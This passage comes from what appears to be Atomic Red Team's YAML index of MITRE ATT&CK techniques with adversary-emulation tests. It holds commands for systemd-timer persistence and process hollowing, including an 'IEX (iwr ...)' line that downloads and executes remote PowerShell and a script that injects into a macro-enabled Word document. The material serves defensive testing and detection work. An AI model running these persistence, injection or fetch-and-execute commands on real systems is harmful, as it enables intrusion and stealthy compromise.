The tampered function is typically invoked using a Windows message. After the process is hijacked and malicious code is executed, the KernelCallbackTable may also be restored to its original state by the rest of the malicious payload.(Citation: Lazarus APT January 2022) Use of the KernelCallbackTable to hijack execution flow may evade detection from security products since the execution can be masked under a legitimate process.
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.0'
atomic_tests: []
T1053.006:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--a542bac9-7bc1-4da7-9a09-96f69e23cc21
created: '2020-10-12T17:50:31.584Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1053/006
external_id: T1053.006
- source_name: Systemd Remote Control
description: Aaron Kili. (2018, January 16). How to Control Systemd Services
on Remote Linux Server. Retrieved July 26, 2021.
url: https://www.tecmint.com/control-systemd-services-on-remote-linux-server/
- source_name: archlinux Systemd Timers Aug 2020
description: archlinux. (2020, August 11). systemd/Timers. Retrieved October
12, 2020.
url: https://wiki.archlinux.org/index.php/Systemd/Timers
- source_name: gist Arch package compromise 10JUL2018
description: Catalin Cimpanu. (2018, July 10). ~x file downloaded in public
Arch package compromise. Retrieved April 23, 2019.
url: https://gist.github.com/campuscodi/74d0d2e35d8fd9499c76333ce027345a
- source_name: Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018
description: Catalin Cimpanu. (2018, July 10). Malware Found in Arch Linux
AUR Package Repository. Retrieved April 23, 2019.
url: https://www.bleepingcomputer.com/news/security/malware-found-in-arch-linux-aur-package-repository/
- source_name: acroread package compromised Arch Linux Mail 8JUL2018
description: Eli Schwartz. (2018, June 8). acroread package compromised. Retrieved
April 23, 2019.
url: https://lists.archlinux.org/pipermail/aur-general/2018-July/034153.html
- source_name: 'Falcon Sandbox smp: 28553b3a9d'
description: Hybrid Analysis. (2018, July 11). HybridAnalsysis of sample 28553b3a9d2ad4361d33d29ac4bf771d008e0073cec01b5561c6348a608f8dd7.
Retrieved September 8, 2023.
url: https://www.hybrid-analysis.com/sample/28553b3a9d2ad4361d33d29ac4bf771d008e0073cec01b5561c6348a608f8dd7?environmentId=300
- source_name: 'Linux man-pages: systemd January 2014'
description: Linux man-pages. (2014, January). systemd(1) - Linux manual page.
Retrieved April 23, 2019.
url: http://man7.org/linux/man-pages/man1/systemd.1.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:11.261Z'
name: 'Scheduled Task/Job: Systemd Timers'
description: |-
Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension .timer that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the systemctl command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control)
Each .timer file must have a corresponding .service file with the same name, e.g., example.timer and example.service. .service files are [Systemd Service](https://attack.mitre.org/techniques/T1543/002) unit files that are managed by the systemd system and service manager.(Citation: Linux man-pages: systemd January 2014) Privileged timers are written to /etc/systemd/system/ and /usr/lib/systemd/system while user level are written to ~/.config/systemd/user/.
An adversary may use systemd timers to execute malicious code at system startup or on a scheduled basis for persistence.(Citation: Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018)(Citation: gist Arch package compromise 10JUL2018)(Citation: acroread package compromised Arch Linux Mail 8JUL2018) Timers installed using privileged paths may be used to maintain root level persistence. Adversaries may also install user level timers to achieve user level persistence.(Citation: Falcon Sandbox smp: 28553b3a9d)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- SarathKumar Rajendran, Trimble Inc
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
x_mitre_version: '1.3'
identifier: T1053.006
atomic_tests:
- name: Create Systemd Service and Timer
auto_generated_guid: f4983098-bb13-44fb-9b2c-46149961807b
description: "This test creates Systemd service and timer then starts and enables
the Systemd timer \n"
supported_platforms:
- linux
input_arguments:
path_to_systemd_service:
description: Path to systemd service unit file
type: path
default: "/etc/systemd/system/art-timer.service"
path_to_systemd_timer:
description: Path to service timer file
type: path
default: "/etc/systemd/system/art-timer.timer"
systemd_service_name:
description: Name of systemd service
type: string
default: art-timer.service
systemd_timer_name:
description: Name of systemd service timer
type: string
default: art-timer.timer
executor:
command: |
echo "[Unit]" > #{path_to_systemd_service}
echo "Description=Atomic Red Team Systemd Timer Service" >> #{path_to_systemd_service}
echo "[Service]" >> #{path_to_systemd_service}
echo "Type=simple" >> #{path_to_systemd_service}
echo "ExecStart=/bin/touch /tmp/art-systemd-timer-marker" >> #{path_to_systemd_service}
echo "[Install]" >> #{path_to_systemd_service}
echo "WantedBy=multi-user.target" >> #{path_to_systemd_service}
echo "[Unit]" > #{path_to_systemd_timer}
echo "Description=Executes Atomic Red Team Systemd Timer Service" >> #{path_to_systemd_timer}
echo "Requires=#{systemd_service_name}" >> #{path_to_systemd_timer}
echo "[Timer]" >> #{path_to_systemd_timer}
echo "Unit=#{systemd_service_name}" >> #{path_to_systemd_timer}
echo "OnCalendar=*-*-* *:*:00" >> #{path_to_systemd_timer}
echo "[Install]" >> #{path_to_systemd_timer}
echo "WantedBy=timers.target" >> #{path_to_systemd_timer}
systemctl start #{systemd_timer_name}
systemctl enable #{systemd_timer_name}
systemctl daemon-reload
cleanup_command: |
systemctl stop #{systemd_timer_name}
systemctl disable #{systemd_timer_name}
rm #{path_to_systemd_service}
rm #{path_to_systemd_timer}
systemctl daemon-reload
name: bash
elevation_required: true
- name: Create a user level transient systemd service and timer
auto_generated_guid: 3de33f5b-62e5-4e63-a2a0-6fd8808c80ec
description: "Schedule a user level transient task (will not survive a reboot)
without having to create the .timer or .service files by using the systemd-run
command. \n"
supported_platforms:
- linux
dependency_executor_name: sh
dependencies:
- description: 'Check if systemd-run exists on the machine
'
prereq_command: 'if [ -x "$(command -v systemd-run)" ]; then exit 0; else
exit 1; fi;
'
get_prereq_command: 'echo "Install systemd on the machine."; exit 1;
'
executor:
elevation_required: false
command: 'systemd-run --user --unit=Atomic-Red-Team --on-calendar ''*:0/1''
/bin/sh -c ''echo "$(date) $(whoami)" >>/tmp/log''
'
cleanup_command: |
systemctl --user stop Atomic-Red-Team.service
systemctl --user stop Atomic-Red-Team.timer
rm /tmp/log
name: sh
- name: Create a system level transient systemd service and timer
auto_generated_guid: d3eda496-1fc0-49e9-aff5-3bec5da9fa22
description: "Schedule a system level transient task (will not survive a reboot)
without having to create the .timer or .service files by using the systemd-run
command. \n"
supported_platforms:
- linux
dependency_executor_name: sh
dependencies:
- description: 'Check if systemd-run exists on the machine
'
prereq_command: 'if [ -x "$(command -v systemd-run)" ]; then exit 0; else
exit 1; fi;
'
get_prereq_command: 'echo "Install systemd on the machine."; exit 1;
'
executor:
elevation_required: true
command: 'systemd-run --unit=Atomic-Red-Team --on-calendar ''*:0/1'' /bin/sh
-c ''echo "$(date) $(whoami)" >>/tmp/log''
'
cleanup_command: |
systemctl stop Atomic-Red-Team.service
systemctl stop Atomic-Red-Team.timer
rm /tmp/log
name: sh
T1574:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6
created: '2020-03-12T20:38:12.465Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1574
external_id: T1574
- source_name: Autoruns for Windows
description: Mark Russinovich. (2019, June 28). Autoruns for Windows v13.96.
Retrieved March 13, 2020.
url: https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:13.820Z'
name: Hijack Execution Flow
description: |-
Adversaries may execute their own malicious payloads by hijacking the way operating systems run programs. Hijacking execution flow can be for the purposes of persistence, since this hijacked execution may reoccur over time. Adversaries may also use these mechanisms to elevate privileges or evade defenses, such as application control or other restrictions on execution.
There are many ways an adversary may hijack the flow of execution, including by manipulating how the operating system locates programs to be executed. How the operating system locates libraries to be used by a program can also be intercepted. Locations where the operating system looks for programs/resources, such as file directories and in the case of Windows the Registry, could also be poisoned to include malicious payloads.
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
- Windows
x_mitre_version: '1.3'
atomic_tests: []
T1543.005:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--b0e54bf7-835e-4f44-bd8e-62f431b9b76a
created: '2024-02-15T13:41:46.784Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1543/005
external_id: T1543.005
- source_name: AppSecco Kubernetes Namespace Breakout 2020
description: Abhisek Datta. (2020, March 18). Kubernetes Namespace Breakout
using Insecure Host Path Volume — Part 1. Retrieved January 16, 2024.
url: https://blog.appsecco.com/kubernetes-namespace-breakout-using-insecure-host-path-volume-part-1-b382f2a6e216
- source_name: Docker Systemd
description: Docker. (n.d.). Start containers automatically. Retrieved February
15, 2024.
url: https://docs.docker.com/config/containers/start-containers-automatically/
- source_name: GTFOBins Docker
description: GTFOBins. (n.d.). docker. Retrieved February 15, 2024.
url: https://gtfobins.github.io/gtfobins/docker/
- source_name: Kubernetes Assigning Pods to Nodes
description: Kubernetes. (n.d.). Assigning Pods to Nodes. Retrieved February
15, 2024.
url: https://kubernetes.io/docs/concepts/scheduling-eviction/assign-pod-node/
- source_name: Kubernetes DaemonSet
description: Kubernetes. (n.d.). DaemonSet. Retrieved February 15, 2024.
url: https://kubernetes.io/docs/concepts/workloads/controllers/daemonset/
- source_name: Aquasec Kubernetes Attack 2023
description: Michael Katchinskiy, Assaf Morag. (2023, April 21). First-Ever
Attack Leveraging Kubernetes RBAC to Backdoor Clusters. Retrieved July 14,
2023.
url: https://blog.aquasec.com/leveraging-kubernetes-rbac-to-backdoor-clusters
- source_name: AquaSec TeamTNT 2023
description: Ofek Itach and Assaf Morag. (2023, July 13). TeamTNT Reemerged
with New Aggressive Cloud Campaign. Retrieved February 15, 2024.
url: https://blog.aquasec.com/teamtnt-reemerged-with-new-aggressive-cloud-campaign
- source_name: Podman Systemd
description: Valentin Rothberg. (2022, March 16). How to run pods as systemd
services with Podman. Retrieved February 15, 2024.
url: https://www.redhat.com/sysadmin/podman-run-pods-systemd-services
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-04-15T22:10:00.252Z'
name: Container Service
description: |-
Adversaries may create or modify container or container cluster management tools that run as daemons, agents, or services on individual hosts. These include software for creating and managing individual containers, such as Docker and Podman, as well as container cluster node-level agents such as kubelet. By modifying these services, an adversary may be able to achieve persistence or escalate their privileges on a host.
For example, by using the `docker run` or `podman run` command with the `restart=always` directive, a container can be configured to persistently restart on the host.(Citation: AquaSec TeamTNT 2023) A user with access to the (rootful) docker command may also be able to escalate their privileges on the host.(Citation: GTFOBins Docker)
In Kubernetes environments, DaemonSets allow an adversary to persistently [Deploy Container](https://attack.mitre.org/techniques/T1610)s on all nodes, including ones added later to the cluster.(Citation: Aquasec Kubernetes Attack 2023)(Citation: Kubernetes DaemonSet) Pods can also be deployed to specific nodes using the `nodeSelector` or `nodeName` fields in the pod spec.(Citation: Kubernetes Assigning Pods to Nodes)(Citation: AppSecco Kubernetes Namespace Breakout 2020)
Note that containers can also be configured to run as [Systemd Service](https://attack.mitre.org/techniques/T1543/002)s.(Citation: Podman Systemd)(Citation: Docker Systemd)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Containers
x_mitre_version: '1.0'
atomic_tests: []
T1078:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--b17a1a56-e99c-403c-8948-561df0cffe81
created: '2017-05-31T21:31:00.645Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1078
external_id: T1078
- source_name: volexity_0day_sophos_FW
description: 'Adair, S., Lancaster, T., Volexity Threat Research. (2022, June
15). DriftingCloud: Zero-Day Sophos Firewall Exploitation and an Insidious
Breach. Retrieved July 1, 2022.'
url: https://www.volexity.com/blog/2022/06/15/driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach/
- source_name: CISA MFA PrintNightmare
description: Cybersecurity and Infrastructure Security Agency. (2022, March
15). Russian State-Sponsored Cyber Actors Gain Network Access by Exploiting
Default Multifactor Authentication Protocols and “PrintNightmare” Vulnerability.
Retrieved March 16, 2022.
url: https://www.cisa.gov/uscert/ncas/alerts/aa22-074a
- source_name: TechNet Credential Theft
description: Microsoft. (2016, April 15). Attractive Accounts for Credential
Theft. Retrieved June 3, 2016.
url: https://technet.microsoft.com/en-us/library/dn535501.aspx
- source_name: TechNet Audit Policy
description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
June 3, 2016.
url: https://technet.microsoft.com/en-us/library/dn487457.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:14.095Z'
name: Valid Accounts
description: |-
Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
In some cases, adversaries may abuse inactive accounts: for example, those belonging to individuals who are no longer part of an organization. Using these accounts may allow the adversary to evade detection, as the original account user will not be present to identify any anomalous activity taking place on their account.(Citation: CISA MFA PrintNightmare)
The overlap of permissions for local, domain, and cloud accounts across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise.(Citation: TechNet Credential Theft)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Syed Ummar Farooqh, McAfee
- Prasad Somasamudram, McAfee
- Sekhar Sarukkai, McAfee
- Jon Sternstein, Stern Security
- Yossi Weizman, Azure Defender Research Team
- Netskope
- Mark Wee
- Praetorian
- Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Containers
- ESXi
- IaaS
- Identity Provider
- Linux
- macOS
- Network Devices
- Office Suite
- SaaS
- Windows
x_mitre_version: '2.8'
atomic_tests: []
T1055.012:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--b200542e-e877-4395-875b-cf1a44537ca4
created: '2020-01-14T17:21:54.470Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1055/012
external_id: T1055.012
- source_name: Nviso Spoof Command Line 2020
description: 'Daman, R. (2020, February 4). The return of the spoof part 2:
Command line spoofing. Retrieved November 19, 2021.'
url: https://blog.nviso.eu/2020/02/04/the-return-of-the-spoof-part-2-command-line-spoofing/
- source_name: Elastic Process Injection July 2017
description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
- source_name: Leitch Hollowing
description: Leitch, J. (n.d.). Process Hollowing. Retrieved September 12,
2024.
url: https://new.dc414.org/wp-content/uploads/2011/01/Process-Hollowing.pdf
- source_name: Mandiant Endpoint Evading 2019
description: 'Pena, E., Erikson, C. (2019, October 10). Staying Hidden on
the Endpoint: Evading Detection with Shellcode. Retrieved November 29, 2021.'
url: https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:14.559Z'
name: 'Process Injection: Process Hollowing'
description: "Adversaries may inject malicious code into suspended and hollowed
processes in order to evade process-based defenses. Process hollowing is a
method of executing arbitrary code in the address space of a separate live
process. \n\nProcess hollowing is commonly performed by creating a process
in a suspended state then unmapping/hollowing its memory, which can then be
replaced with malicious code. A victim process can be created with native
Windows API calls such as CreateProcess, which includes a flag
to suspend the processes primary thread. At this point the process can be
unmapped using APIs calls such as ZwUnmapViewOfSection or NtUnmapViewOfSection
\ before being written to, realigned to the injected code, and resumed via
VirtualAllocEx, WriteProcessMemory, SetThreadContext,
then ResumeThread respectively.(Citation: Leitch Hollowing)(Citation:
Elastic Process Injection July 2017)\n\nThis is very similar to [Thread Local
Storage](https://attack.mitre.org/techniques/T1055/005) but creates a new
process rather than targeting an existing process. This behavior will likely
not result in elevated privileges since the injected process was spawned from
(and thus inherits the security context) of the injecting process. However,
execution via process hollowing may also evade detection from security products
since the execution is masked under a legitimate process. "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.4'
identifier: T1055.012
atomic_tests:
- name: Process Hollowing using PowerShell
auto_generated_guid: 562427b4-39ef-4e8c-af88-463a78e70b9c
description: |
This test uses PowerShell to create a Hollow from a PE on disk with explorer as the parent.
Credit to FuzzySecurity (https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Start-Hollow.ps1)
supported_platforms:
- windows
input_arguments:
script_download_url:
description: Download url for Start-Hollow.ps1
type: string
default: https://raw.githubusercontent.com/FuzzySecurity/PowerShell-Suite/720d8fe82396faf74f2ca19a3fe99a5c262a14b9/Start-Hollow.ps1
script_path:
description: Path to Start-Hollow.ps1
type: path
default: PathToAtomicsFolder\T1055.012\src\Start-Hollow.ps1
hollow_binary_path:
description: Path of the binary to hollow (executable that will run inside
the sponsor)
type: string
default: C:\Windows\System32\cmd.exe
parent_process_name:
description: Name of the parent process
type: string
default: explorer
sponsor_binary_path:
description: Path of the sponsor binary (executable that will host the binary)
type: string
default: C:\Windows\System32\notepad.exe
spawnto_process_name:
description: Name of the process to spawn
type: string
default: notepad
executor:
command: |
. "#{script_path}"
$ppid=Get-Process #{parent_process_name} | select -expand id
Start-Hollow -Sponsor "#{sponsor_binary_path}" -Hollow "#{hollow_binary_path}" -ParentPID $ppid -Verbose
cleanup_command: 'Stop-Process -Name "#{spawnto_process_name}" -ErrorAction
Ignore
'
name: powershell
dependency_executor_name: powershell
dependencies:
- description: 'Start-Hollow.ps1 must be installed
'
prereq_command: 'if (Test-Path "#{script_path}") {exit 0} else {exit 1}
'
get_prereq_command: |
try {
iwr "#{script_download_url}" -OutFile (New-Item -Path #{script_path} -Force)
} catch {
Write-Error $_
Exit 1
}
- name: RunPE via VBA
auto_generated_guid: 3ad4a037-1598-4136-837c-4027e4fa319b
description: 'This module executes notepad.exe from within the WINWORD.EXE process
'
supported_platforms:
- windows
input_arguments:
ms_product:
description: Maldoc application Word
type: string
default: Word
dependency_executor_name: powershell
dependencies:
- description: 'Microsoft #{ms_product} must be installed
'
prereq_command: |
try {
New-Object -COMObject "#{ms_product}.Application" | Out-Null
$process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
Stop-Process -Name $process
exit 0
} catch { exit 1 }
get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product}
manually to meet this requirement"
'
executor:
command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX
(iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\"
-UseBasicParsing) \nInvoke-MalDoc -macroFile \"PathToAtomicsFolder\\T1055.012\\src\\T1055.012-macrocode.txt\"
-officeProduct \"#{ms_product}\" -sub \"Exploit\"\n"
name: powershell
- name: Process Hollowing in Go using CreateProcessW WinAPI
auto_generated_guid: c8f98fe1-c89b-4c49-a7e3-d60ee4bc2f5a
description: |
Creates a process in a suspended state, executes shellcode to spawn calc.exe in a child process, and then resumes the original process.
- PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createprocess)
supported_platforms:
- windows
input_arguments:
hollow_binary_path:
description: Path of the binary to hollow
type: string
default: C:\Windows\System32\werfault.exe
hollow_process_name:
description: Name of the process to hollow
type: string
default: werfault
executor:
name: powershell
elevation_required: false
command: '$PathToAtomicsFolder\T1055.012\bin\x64\CreateProcess.exe -program
"#{hollow_binary_path}" -debug
'
cleanup_command: |
Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
Stop-Process -Name "#{hollow_process_name}" -ErrorAction SilentlyContinue
- name: Process Hollowing in Go using CreateProcessW and CreatePipe WinAPIs (T1055.012)
auto_generated_guid: 94903cc5-d462-498a-b919-b1e5ab155fee
description: |
Create a process in a suspended state, execute shellcode to spawn calc.exe in a child process, and then resume the original process.
This test uses the CreatePipe function to create an anonymous pipe that parent and child processes can communicate over. This anonymous pipe
allows for the retrieval of output generated from executed shellcode.
- PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createprocesswithpipe)
supported_platforms:
- windows
input_arguments:
hollow_binary_path:
description: Path of the binary to hollow
type: string
default: C:\Windows\System32\werfault.exe
hollow_process_name:
description: Name of the process to hollow
type: string
default: werfault
executor:
name: powershell
elevation_required: false
command: '$PathToAtomicsFolder\T1055.012\bin\x64\CreateProcessWithPipe.exe
-program "#{hollow_binary_path}" -debug
'
cleanup_command: |
Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
Stop-Process -Name "#{hollow_process_name}" -ErrorAction SilentlyContinue
T1068:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--b21c3b2d-02e6-45b1-980b-e69051040839
created: '2017-05-31T21:30:55.066Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1068
external_id: T1068
- source_name: ESET InvisiMole June 2020
description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
- source_name: Microsoft Driver Block Rules
description: Microsoft. (2020, October 15). Microsoft recommended driver block
rules. Retrieved March 16, 2021.
url: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules
- source_name: Unit42 AcidBox June 2020
description: 'Reichel, D. and Idrizovic, E. (2020, June 17). AcidBox: Rare
Malware Repurposing Turla Group Exploit Targeted Russian Organizations.
Retrieved March 16, 2021.'
url: https://unit42.paloaltonetworks.com/acidbox-rare-malware/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:14.643Z'
name: Exploitation for Privilege Escalation
description: |-
Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
When initially gaining access to a system, an adversary may be operating within a lower privileged process which will prevent them from accessing certain resources on the system. Vulnerabilities may exist, usually in operating system components and software commonly running at higher permissions, that can be exploited to gain higher levels of access on the system. This could enable someone to move from unprivileged or user level permissions to SYSTEM or root permissions depending on the component that is vulnerable. This could also enable an adversary to move from a virtualized environment, such as within a virtual machine or container, onto the underlying host. This may be a necessary step for an adversary compromising an endpoint system that has been properly configured and limits other privilege escalation methods.
Adversaries may bring a signed vulnerable driver onto a compromised machine so that they can exploit the vulnerability to execute code in kernel mode. This process is sometimes referred to as Bring Your Own Vulnerable Driver (BYOVD).(Citation: ESET InvisiMole June 2020)(Citation: Unit42 AcidBox June 2020) Adversaries may include the vulnerable driver with files delivered during Initial Access or download it to a compromised system via [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) or [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570).
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Joas Antonio dos Santos, @C0d3Cr4zy, Inmetrics
- Yaniv Agman, @AgmanYaniv, Team Nautilus Aqua Security
- Idan Revivo, @idanr86, Team Nautilus Aqua Security
- David Tayouri
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Containers
- Linux
- macOS
- Windows
x_mitre_version: '1.6'
atomic_tests: []
T1546:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--b6301b64-ef57-4cce-bb0b-77026f14a8db
created: '2020-01-22T21:04:23.285Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1546
external_id: T1546
- source_name: FireEye WMI 2015
description: Ballenthin, W., et al. (2015). Windows Management Instrumentation
(WMI) Offense, Defense, and Forensics. Retrieved March 30, 2016.
url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf
- source_name: Microsoft DART Case Report 001
description: Berk Veral. (2020, March 9). Real-life cybercrime stories from
DART, the Microsoft Detection and Response Team. Retrieved May 27, 2022.
url: https://www.microsoft.com/security/blog/2020/03/09/real-life-cybercrime-stories-dart-microsoft-detection-and-response-team
- source_name: amnesia malware
description: Claud Xiao, Cong Zheng, Yanhui Jia. (2017, April 6). New IoT/Linux
Malware Targets DVRs, Forms Botnet. Retrieved February 19, 2018.
url: https://researchcenter.paloaltonetworks.com/2017/04/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
- source_name: Backdooring an AWS account
description: Daniel Grzelak. (2016, July 9). Backdooring an AWS account. Retrieved
May 27, 2022.
url: https://medium.com/daniel-grzelak/backdooring-an-aws-account-da007d36f8f9
- source_name: Varonis Power Automate Data Exfiltration
description: Eric Saraga. (2022, February 2). Using Power Automate for Covert
Data Exfiltration in Microsoft 365. Retrieved May 27, 2022.
url: https://www.varonis.com/blog/power-automate-data-exfiltration
- source_name: Malware Persistence on OS X
description: Patrick Wardle. (2015). Malware Persistence on OS X Yosemite.
Retrieved July 10, 2017.
url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:15.866Z'
name: Event Triggered Execution
description: "Adversaries may establish persistence and/or elevate privileges
using system mechanisms that trigger execution based on specific events. Various
operating systems have means to monitor and subscribe to events such as logons
or other user activity such as running specific applications/binaries. Cloud
environments may also support various functions and services that monitor
and can be invoked in response to specific cloud events.(Citation: Backdooring
an AWS account)(Citation: Varonis Power Automate Data Exfiltration)(Citation:
Microsoft DART Case Report 001)\n\nAdversaries may abuse these mechanisms
as a means of maintaining persistent access to a victim via repeatedly executing
malicious code. After gaining access to a victim system, adversaries may create/modify
event triggers to point to malicious content that will be executed whenever
